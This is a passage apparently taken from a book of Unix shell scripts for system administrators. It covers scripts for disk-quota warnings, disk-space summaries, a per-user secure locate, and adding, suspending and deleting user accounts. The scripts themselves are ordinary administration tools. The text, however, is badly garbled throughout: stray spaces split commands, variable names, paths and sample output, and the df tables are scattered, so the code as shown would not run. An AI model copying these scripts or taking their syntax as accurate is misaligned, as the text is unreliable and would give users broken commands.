d on e | awk " \$2 > $MA XDIS KUSAG E { p r int \ $0 } " > $ vi o la t or s
i f [ ! -s $v iol at ors ] ; then
e cho "No u ser s exce ed t he di s k q u o ta o f $ {M AX D IS KU S AG E }M B"
c at $ vio la tor s
e xit 0
fi
w hi le r ead a cco un t us age ; do
cat << EO F | f mt | mai l -s " War n i ng: $ ac co un t E xc e ed s Q uo t a" $ a cc ou n t
Y ou r d i sk us age i s ${ usag e}MB, but y ou h a ve b ee n a ll o ca t ed o n ly
$ {M AXD I SKU SA GE} MB . T his means tha t you n ee d to ei th e r d el et e s om e o f
y ou r f i les , com pr ess your file s (s e e 'g z i p' o r ' bz ip 2 ' f or p o we rf u l an d
e as y-t o -us e com pr essi on p rogra m s), o r t a l k wi th us a b ou t i nc r ea si n g
y ou r d i sk al loc at ion.
T ha nks for y our c oope rati on in thi s mat t e r.
D av e T a ylo r @ x 55 4
E OF
e cho "Ac co unt $ acco unt has $ u sag e MB o f d is k s pa ce . U s er n o ti fi e d. "
d on e < $vi ol ato rs
e xi t 0

How It Works
Note the addition of the fm t command in the email pipeline:
c at << EOF | fm t | ma il - s "Wa r nin g : $a c c ou nt E x ce ed s Q u ot a" $a cc o un t
It's a handy trick to improve the appearance of automatically generated email when fields of unknown length, like
$ ac cou n t, are embedded in the text. The logic of the f or loop in this script is slightly different from the logic of the
f or loop in Script #39, f qu ota. Because the output of the loop in this script is intended purely for the second part of
the script, during each cycle it simply reports the account name and disk usage rather than a disk quota exceeded
error message.

Running the Script


Like Script #39, this script has no starting arguments and should be run as r o ot for accurate results. This can most
safely be accomplished by using the s udo command.

The Results
$ s udo dis kh ogs
A cc oun t li nd a h as 39. 7 MB of d i sk s p ace . Us er n o ti fi e d.
A cc oun t ta yl or ha s 21 799. 5 MB o f d i s k s p a ce . Us e r no t if i ed .
If we now peek into the lin da account mailbox, we'll see that a message from the script has been delivered:
S ub jec t : W ar nin g: lin da E xceed s Qu o t a
Y ou r d i sk us age i s 39 .7MB , but you h ave b ee n al l oc at e d o nl y 2 0M B.
T hi s m ea n s
t ha t y o u n ee d t o eith er d elete som e of y o ur f il e s, c o mp r es s y ou r f il es (s ee
' gz ip' or 'b zip 2' for pow erful and e asy - t o- us e c om pr e ss i on p r og ra m s) , o r ta l k
w it h u s ab ou t i nc reas ing your d isk a llo c a ti on .
T ha nks for y our c oope rati on on thi s mat t e r.
D av e T a ylo r @ x 55 4

Hacking the Script


A useful refinement to this script would be to allow certain users to have larger quotas than others. This could easily be
accomplished by creating a separate file that defines the disk quota for each user and by declaring in the script a
default quota for users not appearing in the file. A file with account name and quota pairs can be scanned with g re p
and the second field extracted with a call to cu t -f 2 .

#41 Figuring Out Available Disk Space


Related to disk quota management is the simpler question of how much disk space is available on the system. The d f
command reports disk usage on a per-disk basis, but the output can be a bit baffling:
$ df
F il esy s tem
1 K-bl ocks
U sed A va il ab l e Us e % M ou nt e d on
/ de v/h d b2
2569 5892
18 7 1 048
22 51 95 6 4
8% /
/ de v/h d b1
10 1089
6 218
8 96 5 2
7 % / bo ot
n on e
12 7744
0
12 77 4 4
0 % / de v/ s hm
What would be much more useful is a version of df that summarizes the available capacity values in column four and
then presents the summary in a way that is easily understood. It's a task easily accomplished in a script.

The Code
# !/ bin / sh
# d isk s pac e - S um mari zes avail a ble d isk s pa ce a n d pr e se n ts i t i n a l og i ca l
#
a n d r ea dab le fas hion .
t em pfi l e=" /t mp/ av aila ble. $$"
t ra p " r m - f $te mp file " EX IT
c at << 'EO F' > $t empf ile
{ s um += $4 }
E ND { m b = s um / 1024
g b = m b / 1 024
p rin tf "% .0 f MB (%. 2fGB) of a v ail a b le d is k s pa c e\ n ", m b , gb
}
E OF
d f -k | aw k -f $t empf ile
e xi t 0

Running the Script


This script can be run as any user and produces a succinct one-line summary of available disk space.

The Results
On the same system on which the df output shown earlier was generated, the script reports the following:
$ d isk s pac e
9 61 99 M B ( 93 .94 GB ) of ava ilabl e di s k sp a c e

Hacking the Script


If your system has lots of disk space across many multigigabyte drives, you might even expand this script to
automatically return values in terabytes as needed. If you're just out of space, it'll doubtless be discouraging to see
0.03GB of available disk space, but that's a good incentive to use di s kh og s (Script #40) and clean things up, right?
Another issue to consider is whether it's more useful to know about the available disk space on all devices, including
those partitions that cannot grow (like / boot), or whether reporting on user volumes is sufficient. If the latter is the
case, you can improve this script by making a call to gre p immediately after the df call. Use g re p with the desired
device names to include only particular devices, or use gre p -v followed by the unwanted device names to screen
out devices you don't want included.

#42 Improving the Readability of df Output


While Script #41 summarized df command output, the most important change we can make to d f is simply to improve
the readability of its output.

The Code
# !/ bin / sh
# n ewd f - A fri en dlie r ve rsion of d f .
a wk scr i pt= "/ tmp /n ewdf .$$"
t ra p " r m - f $aw ks crip t" E XIT
c at << 'EO F' > $a wksc ript
f un cti o n s ho wun it (siz e)
{ m b = siz e / 1 02 4; p rett ymb=( i nt( m b * 1 0 0) ) / 1 00 ;
g b = mb / 102 4; pre ttyg b=(in t (gb * 10 0 ) ) / 10 0 ;

i f ( s ubs tr (si ze ,1,1 ) !~ "[0- 9 ]" | |


sub st r(s iz e,2, 1) ! ~ "[0 - 9]" ) { r e t ur n si z e }
e lse if (m b < 1 ) { retu rn si z e " K " }
e lse if (g b < 1 ) { retu rn pr e tty m b "M " }
e lse
{ retu rn pr e tty g b "G " }

B EG IN {
p rin t f " %- 27s % 7s % 7s % 7s %8 s %- s \ n",
"F il esy st em", "Si ze", " Use d " , " A v ai l" , " Ca pa c it y ", " M ou nt e d"
}
! /F ile s yst em / {
s ize = sho wu nit ($ 2);
u sed = sho wu nit ($ 3);
a vai l =sh ow uni t( $4);
p rin t f " %- 27s % 7s % 7s % 7s %8 s %- s \ n",
$1 , siz e, use d, a vail, $5, $ 6

}
E OF

d f -k | aw k -f $a wksc ript
e xi t 0

How It Works
Much of the work in this script takes place within an awk script, and it wouldn't be too much of a step to write the
entire script in a wk rather than in the shell, using the s y ste m ( ) function to call df directly. This script would be an
ideal candidate to rewrite in Perl, but that's outside the scope of this book.
There's also a trick in this script that comes from my early days of programming in BASIC, of all things:
p re tty m b=( in t(m b * 10 0)) / 100 ;
When working with arbitrary-precision numeric values, a quick way to limit the number of fractional digits is to multiply
the value by a power of 10, convert it to an integer (which drops the fractional portion), and then divide it back by the
same power of 10. In this case, a value like 7.085344324 is turned into the much more attractive 7.08.
Note Some versions of df have an -h flag that offers an output format similar to this script's output format.
However, as with many of the scripts in this book, this one will let you achieve friendly and more meaningful
output on every Unix or Linux system, regardless of what version of d f is present.

Running the Script


This script has no arguments and can be run by anyone, r o o t or otherwise. To eliminate reporting space usage on
devices that you aren't interested in, use gr ep -v after the call to df .

The Results
Regular df reports are difficult to understand:
$ df
F il esy s tem
5 12-bl o cks
U s ed
A va il Ca p ac it y
/ de v/d i sk1 s9
7815 7 200 4 318 7 7 12 3 44 5 74 88
55 %
d ev fs
196
1 96
0
1 00 %
f de sc
2
2
0
1 00 %
< vo lfs >
1 024
1 0 24
0
1 00 %
/ de v/d i sk0 s9
23441 9 552 7 186 3 1 52 1 62 5 56 41 6
30 %
The new script exploits a wk to improve readability:
$ n ewd f
F il esy s tem
Siz e
/ de v/d i sk1 s9
3 7 .26 G
d ev fs
98 K
f de sc
1
< vo lfs >
512 K
/ de v/d i sk0 s9
11 1 .77 G

U s ed
20 . 5 9G
9 8K
1
5 1 2K
34 . 2 6G

A v ai l C ap a ci ty
16 . 43 G
5 5%
0
10 0%
0
10 0%
0
10 0%
77 . 51 G
3 0%

Mo u nt ed on
/
/d e v
/d e v
/. v ol
/ V ol um e s/ 11 0 GB

M ou n te d
/
/ de v
/ de v
/ .v o l
/ Vo l um es / 11 0G B

#43 Implementing a Secure Locate


The loc a te script presented as Script #19 is useful but has a security problem: If the build process is run as r oo t ,
it builds a list of all files and directories on the entire system, regardless of owner, allowing users to see directories
and filenames that they wouldn't otherwise have permission to access. The build process can be run as a generic user
(as Mac OS X does, running m kloc ated b as user nob o d y), but that's not right either, because as a user I want to
be able to locate file matches anywhere in my directory tree, regardless of whether user no b od y can see them.
One way to solve this dilemma is to increase the data saved in the l oc at e database so that each entry has an
owner, group, and permissions string attached, but then the m k lo ca te d b database itself remains insecure unless the
l oc ate script is run as either a se tuid or s etg i d script, and that's something to be avoided at all cost.
A compromise is to have a separate loca te db for each user. But it's not quite that bad, because a personal
database is needed only for users who actually use the lo c a te command. Once invoked, the system creates a
. lo cat e db file in the user's home directory, and a c r on job can update existing .l oc a te db files nightly to keep
them in sync. The very first time someone runs the secure s l oca t e script, it outputs a message warning them that
they may see only matches for files that are publicly accessible. Starting the very next day (depending on the cr o n
schedule) the users get their personalized results.

The Code
Two scripts are necessary for a secure locate: the database builder, mk s lo ca t ed b , and the actual locate search
utility, sloca te:
# !/ bin / sh
# m ksl o cat ed b - B uild s th e cen t ral , pub l i c lo ca t e da t ab a se a s u se r n ob o dy ,
#
a n d s im ult an eous ly s teps t hro u g h e a c h us er ' s ho m e d ir ec t or y t o fi n d th o se
#
t h at co nta in an .slo cated b fi l e . I f fo un d, an a d di t io na l , pr i va te
#
v e rsi on of t he l ocat e dat a bas e wil l be c re a te d f or th at us er .
l oc ate d b=" /v ar/ lo cate .db"
s lo cat e db= ". slo ca tedb "
i f [ " $ (wh oa mi) " != " root " ] ; the n
e cho "$0 : Err or : Yo u mu st be roo t to r u n th is co mm a nd . " >& 2
e xit 1
fi
i f [ " $ (gr ep '^ no body :' / etc/p a ssw d ) " = " " ] ; t he n
e cho "$0 : Err or : yo u mu st ha v e a n acc o u nt f or us er 'n o bo dy ' " >& 2
e cho "to c rea te the def ault s loc a t e d a t ab as e. " > &2 ; e x it 1
fi
cd /

# sid este p pos t -su p wd p e rm is si o n pr o bl e ms

# F irs t , c re ate o r up date the p ubl i c da t a ba se


s u -fm nob od y - c "fin d / -prin t " > $ loc a t ed b 2> / de v/ n ul l
e ch o " b uil di ng de faul t sl ocate dat a b ase ( us er = no bo d y) "
e ch o . . . r es ult i s $( wc - l < $ l oca t e db) l in es l o ng .
# N ow s tep t hro ug h th e us er ac c oun t s on t he s ys t em t o s e e wh o h as
# a $s l oca te db fi le i n th eir h o me d i rec t o ry .. ..
f or ac c oun t in $( cut -d: -f1 / e tc/ p a ssw d )
do
h ome d ir= "$ (gr ep "^$ {acc ount} : " / e t c/p a s sw d | c ut - d : - f6 )"
i f [ "$h om edi r" = " /" ] ; th e n
co n tin ue
# ref use to bu i ld o n e f o r r oo t d ir
e lif [ - e $ho me dir/ $slo cated b ] ; the n
ec h o " bu ild in g sl ocat e dat a bas e for u se r $a c co un t "
su -fm $ acc ou nt - c "f ind / -pr i n t" > $h om ed i r/ $s l oc a te db \
2 > /de v/ nul l

fi
d on e

ch m od 60 0 $ ho medi r/$s locat e db


ch o wn $a cco un t $h omed ir/$s l oca t e db
ec h o . .. re su lt i s $( wc -l < $ h o med i r /$ sl oc a te db ) l i ne s l on g.

e xi t 0
The slo c ate script itself is the user interface to the s l o cat e database:
# !/ bin / sh
# s loc a te - Tri es to sear ch th e us e r 's o w n se cu r e sl o ca t ed b d at ab a se f o r th e
#
s p eci fi ed pa tter n. I f no d ata b a se e x is ts , o ut pu t s a w ar n in g a nd c r ea te s
#
o n e. If pe rs onal slo cated b is e mpt y , u se s s ys te m o n e in s te ad .
l oc ate d b=" /v ar/ lo cate .db"
s lo cat e db= "$ HOM E/ .slo cate db"
i f [ ! -e $s loc at edb -o " $1" = "-- e x pla i n " ] ; t he n
c at < < " EO F" >& 2
W ar nin g : S ec ure l ocat e ke eps a pri v a te d a ta ba se fo r e ac h u se r , an d y ou r
d at aba s e h as n't y et b een creat e d. U n til i t is ( p ro ba b ly la te to ni g ht )
I 'l l j u st us e t he pub lic locat e da t a bas e , w hi ch wi ll sh o w yo u a ll
p ub lic l y a cc ess ib le m atch es, r a the r tha n th os e e xp li c it l y av a il ab l e to
a cc oun t ${ US ER: -$ LOGN AME} .
E OF
i f [ "$1 " = " -- expl ain" ] ; t hen
ex i t 0
fi
# Be f ore w e g o, cre ate a .sl o cat e d b s o th at c r on w i ll fi ll it
# th e ne xt ti me the mks locat e db s c rip t is r un
t ouc h $s lo cat ed b
c hmo d 60 0 $sl oc ated b

# mksl o cat e d b w i l l bu il d i t n ex t t im e t hr o ug h
# star t on t he r i gh t fo o t wi t h p er mi s si on s

e li f [ -s $s loc at edb ] ; then


l oca t edb =$ slo ca tedb
e ls e
e cho "Wa rn ing : usin g pu blic d ata b a se. U se \ "$ 0 - -e x pl a in \" fo r d et ai l s. " > &2
fi
i f [ - z "$ 1" ] ; then
e cho "Us ag e: $0 pat tern " >&2 ; ex i t 1
fi
e xe c g r ep -i "$ 1" $lo cate db

How It Works
The mks l oca te db script revolves around the idea that the r oo t user can temporarily become another user ID by
using s u -fm us er , and so therefore can run f i n d on the file system of each user in order to create a userspecific database of filenames. Working with the s u command proves tricky within this script, though, because by
default su not only wants to change the effective user ID but also wants to import the environment of the specified
account. The end result is odd and confusing error messages on just about any Unix unless the -m flag is specified,
which prevents the user environment from being imported. The -f flag is extra insurance, bypassing the .c sh r c file
for any c s h or tc sh users.
The other unusual notation in mks loca tedb is 2>/ d e v/n u l l, which routes all error messages directly to the
proverbial bit bucket: Anything redirected to /d e v /nu l l vanishes without a trace. It's an easy way to skip the
inevitable flood of permission denied error messages for each f i nd function invoked.

Running the Scripts


The mks l oca te db script is very unusual in that not only must it be run as ro o t, but using s u do won't cut it. You
need to either log in as roo t or use the more powerful s u command to become ro o t before running the script. The
s lo cat e script, of course, has no such requirements.

The Results
Building the sl oc ate database for both no b ody (the public database) and user t a yl or on a Red Hat Linux 10.0
box produces the following output:
# m ksl o cat ed b
b ui ldi n g d ef aul t sloc ate datab a se ( u ser = n ob od y )
. .. re s ult i s 9 98 09 l ines long .
b ui ldi n g s lo cat e data base for u ser t ayl o r
. .. re s ult i s 9 98 08 l ines long .
The same command run on a pretty full Mac OS X box, for comparison, produces the following:
# m ksl o cat ed b
b ui ldi n g d ef aul t sloc ate datab a se ( u ser = n ob od y )
. .. re s ult i s 2 40 160 line s lon g .
b ui ldi n g s lo cat e data base for u ser t ayl o r
. .. re s ult i s 2 63 862 line s lon g .
To search for a particular file or set of files that match a given pattern, let's first try it as user ti n ti n (who doesn't
have an . s loc at edb file):
t in tin $ s lo cat e Tayl or-S elf-A s ses s . doc
W ar nin g : u si ng pu blic dat abase . Us e "sl o c at e -- e xp la i n" fo r d et ai l s.
$
Now we'll enter the same command but as user ta y l or (who owns the file being sought):
t ay lor $ s lo cat e Tayl or-S elf-A s ses s . doc
/ Us ers / tay lo r/D oc umen ts/M erric k /Ta y l or- S e lf -A ss e ss .d o c

Hacking the Script


If you have a very large file system, it's possible that this approach will consume a nontrivial amount of space. One way
to address this issue would be to make sure that the individual .s lo ca t ed b database files don't contain entries for
files that also appear in the central public database. This requires a bit more processing up front (s o rt both, and then
use d i ff), but it could pay off in terms of saved space.
Another technique aimed at saving space would be to build the individual .s l oc a te db files with references only to
files that have been accessed since the last update. This would work better if the m ks l oc at e db script was run
weekly rather than daily; otherwise each Monday all users would be back to ground zero because they're unlikely to
have run the sl oca te command over the weekend.
Finally, another easy way to save space would be to keep the .s l oc a te db files compressed and uncompress them
on the fly when they are searched with s loca t e . See the z g r ep command in Script #37 for inspiration regarding
how this technique might be utilized.

#44 Adding Users to the System


If you're responsible for managing a network of Unix or Linux systems, you've already experienced the frustration
caused by subtle incompatibilities among the different operating systems in your dominion. Some of the most basic
administration tasks prove to be the most incompatible across different flavors of Unix, and chief among these tasks is
user account management. Rather than have a single command-line interface that is 100 percent consistent across all
Unix flavors, each vendor has developed its own graphical interface for working with the peculiarities and quirks of its
own Unix.
The Simple Network Management Protocol (SNMP) was, ostensibly, supposed to help normalize this sort of thing, but
managing user accounts is just as difficult now as it was a decade ago, particularly in a heterogeneous computing
environment. As a result, a very helpful set of scripts for a system administrator includes a version of a d du se r ,
d el ete u ser , and su sp endu ser that can be customized for your specific needs and then easily ported to all your
Unix systems.
Mac OS X is the odd OS out!

Mac OS X is an exception to this rule, with its reliance on an


account database called NetInfo. Versions of these tools for
Mac OS X are presented in Chapter 11.

On a Unix system, an account is created by adding a unique entry to the /e tc / pa s sw d file, an entry consisting of
a one-to eight-character account name, a unique user ID, a group ID, a home directory, and a login shell for that user.
Modern Unix systems store the encrypted password value in / etc / sh a do w, so an entry must be added to that file
too, and finally the account needs to be listed in the / e tc/ g r ou p file, with the user either as his or her own group (a
more recent strategy implemented in this script) or as part of an existing group.

The Code
# !/ bin / sh
# a ddu s er - Add s a ne w us er to the s yst e m , in cl u di ng bu i ld in g t he i r
#
hom e dire ctor y, co p yin g in d e fa ul t c on fi g d a ta , e tc .
#
For a sta ndar d Uni x /Li n u x s y s te m, n o t Ma c O S X .
p wf ile = "/e tc /pa ss wd"
g fi le= " /et c/ gro up "
h di r=" / hom e"

s hadow f ile = " /et c / sh ad ow "

i f [ " $ (wh oa mi) " != " root " ] ; the n


e cho "Er ro r: Yo u mu st b e roo t to r un t h is c om m an d. " > & 2
e xit 1
fi
e ch o " A dd ne w u se r ac coun t to $ (ho s t nam e ) "
e ch o - n "l og in: "
; r ead l o gin
# A dju s t ' 50 00' t o ma tch the t o p e n d of y ou r us e r ac c ou n t na m es pa c e
# b eca u se so me sy stem acc ounts hav e uid ' s l ik e 6 55 35 an d s im i la r.
u id ="$ ( awk - F: '{ if (big < $3 && $ 3 < 5 0 00 ) bi g =$ 3 } E N D { p ri nt bi g + 1 } '
$ pw fil e )"
h om edi r =$h di r/$ lo gin
# W e a r e g iv ing e ach user thei r ow n gro u p , so g i d= ui d
g id =$u i d
e ch o - n "f ul l n am e: " ; r ead f u lln a m e
e ch o - n "s he ll: "
; r ead s h ell
e ch o " S ett in g u p acco unt $logi n fo r $fu l l na me .. . "
e ch o $ { log in }:x :$ {uid }:${ gid}: $ {fu l l nam e } :$ {h om e di r} : $s h el l > > $p w fi le
e ch o $ { log in }:* :1 1647 :0:9 9999: 7 ::: > > $ s h ad ow fi l e
e ch o " $ {lo gi n}: x: ${gi d}:$ login " >> $ gfi l e

m kd ir $ hom ed ir
c p -R / etc /s kel /. [a-z A-Z] * $ho m edi r
c hm od 7 55 $h ome di r
f in d $ h ome di r - pr int | xa rgs c h own $ {lo g i n} :$ {l o gi n}
# S ett i ng an in it ial pass word
p as swd $lo gi n
e xi t 0

How It Works
The coolest single line in this script contains the snippet
a wk -F : '{ i f ( bi g < $3 & & $3 < 50 0 0 ) b i g =$ 3 } E ND { pr i nt b i g + 1 } ' $ pw fi l e
This scans through the /e tc /pas swd file, ascertaining the largest user ID currently in use that's less than the
highest allowable user account value (adjust this for your configuration preferences) and then adding 1 to it for the new
account user ID. This saves the admin from having to remember what the next available ID is, and it also offers a high
degree of consistency in account information as the user community evolves and changes.
Once the account is created, the new home directory is created and the contents of the / et c /s ke l directory are
copied to the home directory. By convention, the / e tc/ s k el directory is where a master .c s hr c, . lo g in ,
. ba shr c , and .p rof il e are kept, and on sites where there's a web server offering ~ ac c ou nt service, a
directory like /e tc /sk el /pub lic_ html would also be copied across to the new home directory, alleviating
many "Where do I create my new website?" questions.

Running the Script


This script must be run by ro ot and has no starting arguments.

The Results
Because my system already has an account named t i nti n , it's helpful to ensure that s no wy has his own account
too: [1 ]
$ s udo add us er
A dd ne w us er ac co unt to a urora
l og in: sno wy
f ul l n a me: S now y the Dog
s he ll: /bi n/ bas h
S et tin g up a cco un t sn owy for S n owy t he D o g. ..
C ha ngi n g p as swo rd for use r sno w y.
N ew pa s swo rd :
R et ype new p ass wo rd:
p as swd : al l aut he ntic atio n tok e ns u p dat e d s uc ce s sf ul l y.

Hacking the Script


One significant advantage of using your own ad d u ser script is that you can also add code and change the logic of
certain operations without worrying about an OS upgrade stepping on the modifications. Possible modifications include
automatically sending a "welcome" email that outlines usage guidelines and online help options, automatically printing
out an account information sheet that can be routed to the user, adding a f i rs t na me _ la st n am e or
f ir stn a me. la stn am e alias to the mail al i a ses file, or even copying into the account a set of files so that the
owner can immediately begin to be productive on a team project.
[1 ] Wondering what on earth I'm talking about here? It's The Adventures of Tintin, by Herg, a wonderful series of

illustrated adventures from the middle of the 20th century. See ht t p: / /w ww . ti n ti n. c om /

#45 Suspending a User Account


Whether a user is being escorted off the premises by security for industrial espionage, a student is taking the summer
off, or a contractor is going on hiatus, there are many times when it's useful to disable an account without actually
deleting it from the system.
This can be done simply by changing the user's password to a new value that he or she isn't told, but if the user is
logged in at the time, it's also important to log him or her out and shut off access to that home directory from other
accounts on the system. When an account is suspended, odds are very good that the user needs to be off the system
now, not when he or she feels like it.
Much of this script revolves around ascertaining whether the user is logged in, notifying the user that he or she is being
logged off, and kicking the user off the system.

The Code
# !/ bin / sh
# # sus p end us er - Susp ends a us e r a c c oun t fo r th e i nd e fi n it e f ut ur e .
h om edi r ="/ ho me"
s ec s=1 0

# home dir e c tor y fo r us e rs


# seco n ds b e for e us er i s l og g ed ou t

i f [ - z $1 ] ; th en
e cho "Us ag e: $0 acc ount " >&2 ; e x i t 1
e li f [ "$( wh oam i) " != "ro ot" ] ; t h e n
e cho "Er ro r. Yo u mu st b e 'ro o t' t o ru n th is c o mm an d ." >& 2; ex it 1
fi
e ch o " P lea se ch an ge a ccou nt $1 pas s w ord t o so me t hi ng ne w ."
p as swd $1
# N ow l et' s see i f th ey'r e log g ed i n an d , i f so , b oo t ' e m
i f who | gre p "$1 " > /d ev/n ull ; the n
t ty= " $(w ho | gr ep $ 1 | tail - 1 | a wk ' { pr in t $ 2} ') "
c at < < " EO F" > /dev /$tt y
* ** *** * *** ** *** ** **** **** ***** * *** * * *** * * ** ** ** * ** ** * ** * ** ** *
U RG ENT NOT IC E F RO M TH E AD MINIS T RAT O R :
T hi s a c cou nt is b eing sus pende d at t he r e qu es t o f ma n ag e me nt .
Y ou ar e go in g t o be l ogge d out in $ s ecs s ec on ds . P le a se im me d ia te l y
s hu t d o wn an y p ro cess es y ou ha v e r u n nin g an d lo g o ut .
I f you hav e any q uest ions , ple a se c o nta c t y ou r s up er v is o r or
J oh n D o e, Di rec to r of Inf ormat i on T e chn o l og y.
* ** *** * *** ** *** ** **** **** ***** * *** * * *** * * ** ** ** * ** ** * ** * ** ** *
E OF
e cho "(W ar ned $ 1, n ow s leepi n g $ s e cs s e co nd s) "
s lee p $s ec s
j obs = $(p s -u $1 | c ut - d\ -f 1 )
k ill -s HU P $ jo bs
# s e nd h an g up s i g t o th e ir p r oc es s es
s lee p 1
# g i ve i t a s ec o nd . ..
k ill -s KI LL $j obs > /d ev/nu l l 2 > 1 # a n d ki ll an yt h in g l ef t
fi

e cho "$1 w as lo gged in. Just log g e d t h e m ou t. "

# F ina l ly, l et' s clos e of f the i r h o m e d i r ec to ry fr om pr y in g e ye s:

c hm od 0 00 $h ome di r/$1
e ch o " A cco un t $ 1 has been susp e nde d . "
e xi t 0

How It Works
This script is straightforward, changing the user's password to an unknown (to the user) value and then shutting off the
user's home directory. If he or she is logged in, we give a few seconds' warning and then log the user out by killing all
of his or her running processes.
Notice the sequence of sending a SI GHUP (H UP) to each running process, a hang-up signal, and then after a second
sending the more aggressive SIGK ILL (KIL L ) . The SI G H UP signal often, but not always, quits running
applications, but it won't kill a login shell. SIGK I LL, however, cannot be ignored or blocked by any running Unix
program, so it's guaranteed 100 percent effective, though it doesn't give the application any time to clean up temp files,
flush file buffers to ensure that changes are written to disk, and so forth.
Unsuspending a user is a simple two-step process of opening his or her home directory back up (with c hm od 70 0)
and resetting the password to a known value (with p ass w d ).

Running the Script


This script must be run as ro ot, and it has one argument: the name of the account to suspend.

The Results
It turns out that Snowy has already been abusing his account. Let's suspend him:
$ s udo sus pe ndu se r sn owy
P le ase cha ng e a cc ount sno wy pa s swo r d to s om et hi n g ne w .
C ha ngi n g p as swo rd for use r sno w y.
N ew pa s swo rd :
R et ype new p ass wo rd:
p as swd : al l aut he ntic atio n tok e ns u p dat e d s uc ce s sf ul l y.
( Wa rne d sn ow y, no w sl eepi ng 10 sec o n ds)
s no wy w as lo gge d in. Just logg e d t h e m o u t .
A cc oun t sn ow y h as bee n su spend e d.
Snowy was logged in at the time, and here's what he saw on his screen just seconds before he was kicked off the
system:
* ** *** * *** ** *** ** **** **** ***** * *** * * *** * * ** ** ** * ** ** * ** * ** ** *
U RG ENT NOT IC E F RO M TH E AD MINIS T RAT O R :
T hi s a c cou nt is b eing sus pende d at t he r e qu es t o f ma n ag e me nt .
Y ou ar e go in g t o be l ogge d out in 1 0 se c o nd s. P l ea se im m ed ia t el y
s hu t d o wn an y p ro cess es y ou ha v e r u n nin g an d lo g o ut .
I f you hav e any q uest ions , ple a se c o nta c t y ou r s up er v is o r or
J oh n D o e, Di rec to r of Inf ormat i on T e chn o l og y.
* ** *** * *** ** *** ** **** **** ***** * *** * * *** * * ** ** ** * ** ** * ** * ** ** *

#46 Deleting a User Account


Deleting an account is a bit more tricky than suspending it, because the script needs to check the entire file system for
files owned by the user, and this must be done before the account information is removed from / e tc /p a ss wd and
/ et c/s h ado w.

The Code
# !/ bin / sh
# # del e teu se r - D elet es a user acc o u nt w i th ou t a t ra c e. . .
#
Not f or u se w ith M a c O S X
h om edi r ="/ ho me"
p wf ile = "/e tc /pa ss wd"
sh a d ow= " / et c/ sh a do w"
n ew pwf i le= "/ etc /p assw d.ne w"
ne w s had o w =" /e tc / sh ad o w. n ew "
s us pen d ="/ us r/l oc al/b in/s uspen d use r "
l oc ker = "/e tc /pa ss wd.l ock"
i f [ - z $1 ] ; th en
e cho "Us ag e: $0 acc ount " >&2 ; ex i t 1
e li f [ "$( wh oam i) " != "ro ot" ] ; t h e n
e cho "Er ro r: yo u mu st b e 'ro o t' t o ru n th is c o mm an d ." > &2 ; e xi t 1
fi
$ su spe n d $ 1

# susp end their acc o u nt w h il e we do t h e d ir ty wo rk

u id ="$ ( gre p -E "^ ${1} :" $ pwfil e | c u t - d : - f3 )"


i f [ - z $u id ] ; then
ec ho " Err or : n o acco unt $1 fo u nd i n $p w f il e" > & 2; e x it 1
fi
# R emo v e f ro m t he pas swor d and sha d o w f i l es
g re p - v E " ^$ {1} :" $pw file > $n e wpw f i le
g re p - v E " ^$ {1} :" $sh adow > $n e wsh a d ow
l oc kcm d ="$ (w hic h lock file )"
# f in d l oc kf i le ap p i n th e p at h
i f [ ! -z $l ock cm d ] ; th en
# l et 's us e t he sy st e m lo c kf il e
e val $lo ck cmd - r 15 $lo cker
e ls e
# u lp , l et 's do it o u rs el v es
w hil e [ -e $l oc ker ] ; do
ec h o " wa iti ng for the pass w ord f ile " ; sl ee p 1
d one
t ouc h $l oc ker
# c re at e d a f il e -b as e d lo c k
fi
m v $ne w pwf il e $ pw file
m v $ne w sha do w $ sh adow
r m -f $ loc ke r

# c li ck ! u nl o ck e d ag a in

c hm od 6 44 $p wfi le
c hm od 4 00 $s had ow
# N ow r emo ve ho me dir ecto ry an d li s t an y t hi ng l e ft .. .
r m -rf $ho me dir /$ 1
e ch o " F ile s sti ll lef t to remo v e ( i f an y ) :"
f in d / -ui d $ui d -pri nt 2 >/dev / nul l | s e d ' s/ ^/ /'
e ch o " "
e ch o " A cco un t $ 1 (uid $ui d) ha s be e n de l e te d, a n d th e ir ho me di re c to ry "
e ch o " ( $ho me dir /$ 1) h as b een r e mov e d ."
e xi t 0

How It Works
To avoid any problems with things changing underfoot, notice that the very first task that de le t eu se r performs is to
suspend the user account by calling su spend u ser .
Before modifying the password file, this script locks it using the l oc kf il e program, if it's available. If not, it drops
back to a relatively primitive locking mechanism through the creation of the file / e tc /p a ss wd . lo ck . If the lock file
already exists, this script will sit and wait for it to be deleted by another program; once it's gone, d el et e us er
immediately creates it and proceeds.

Running the Code


This script must be run as ro ot (use sudo) and needs the name of the account to delete specified as the command
argument.
Danger!

Notice that this script is irreversible and causes lots of files to vanish, so do be careful if you want
to experiment with it!

The Results
$ s udo del et eus er sno wy
P le ase cha ng e a cc ount sno wy pa s swo r d to s om et hi n g ne w .
C ha ngi n g p as swo rd for use r sno w y.
N ew pa s swo rd :
R et ype new p ass wo rd:
p as swd : al l aut he ntic atio n tok e ns u p dat e d s uc ce s sf ul l y.
A cc oun t sn ow y h as bee n su spend e d.
F il es s til l lef t to r emov e (if any ) :
/ var / log /d ogb on e.av i
A cc oun t sn ow y ( ui d 50 2) h as be e n d e l ete d , a nd t h ei r h om e d ir e ct or y
( /h ome / sno wy ) h as bee n re moved .
That sneaky Snowy had hidden an AVI file (d og b o ne. a v i) in /v ar /l o g. Lucky we noticed that who knows
what it could be?

Hacking the Script


This d elete use r script is deliberately not complete. Sysadmins will decide what additional steps to take, whether it
is compressing and archiving a final copy of the account files, writing them to tape, burning them on a CD-ROM, or
even mailing them directly to the FBI (hopefully I'm just kidding on that last one). In addition, the account needs to be
removed from the / etc /g roup files. If there are stray files outside of the user's home directory, the f in d command
identifies them, but it's still up to the admin to examine and delete each one, as appropriate.

#47 Validating the User Environment


Because people migrate their login, profile, and other shell environment customizations from one system to another, it's
not uncommon to have progressive decay in these settings. Eventually, the PA T H can include directories that aren't on
the system, the P AGE R can point to a nonexistent binary, and worse.
A sophisticated solution to this problem is first to check the P A T H to ensure that it includes only valid directories on the
system, and then to check each of the key helper application settings to ensure that they're either indicating a fully
qualified file that exists or that they are specifying a binary that's in the PA TH .

The Code
# !/ bin / sh
# v ali d ato r - C he cks to e nsure tha t the P AT H co n ta in s o n ly v a li d d ir ec t or ie s ,
#
th e n c he cks t hat all envir o nme n t va r i ab le s a re v a li d .
#
Lo o ks at SH EL L, H OME, PATH , ED I T OR, M AI L, a n d PA G ER .
e rr ors = 0
i n_ pat h ()
{
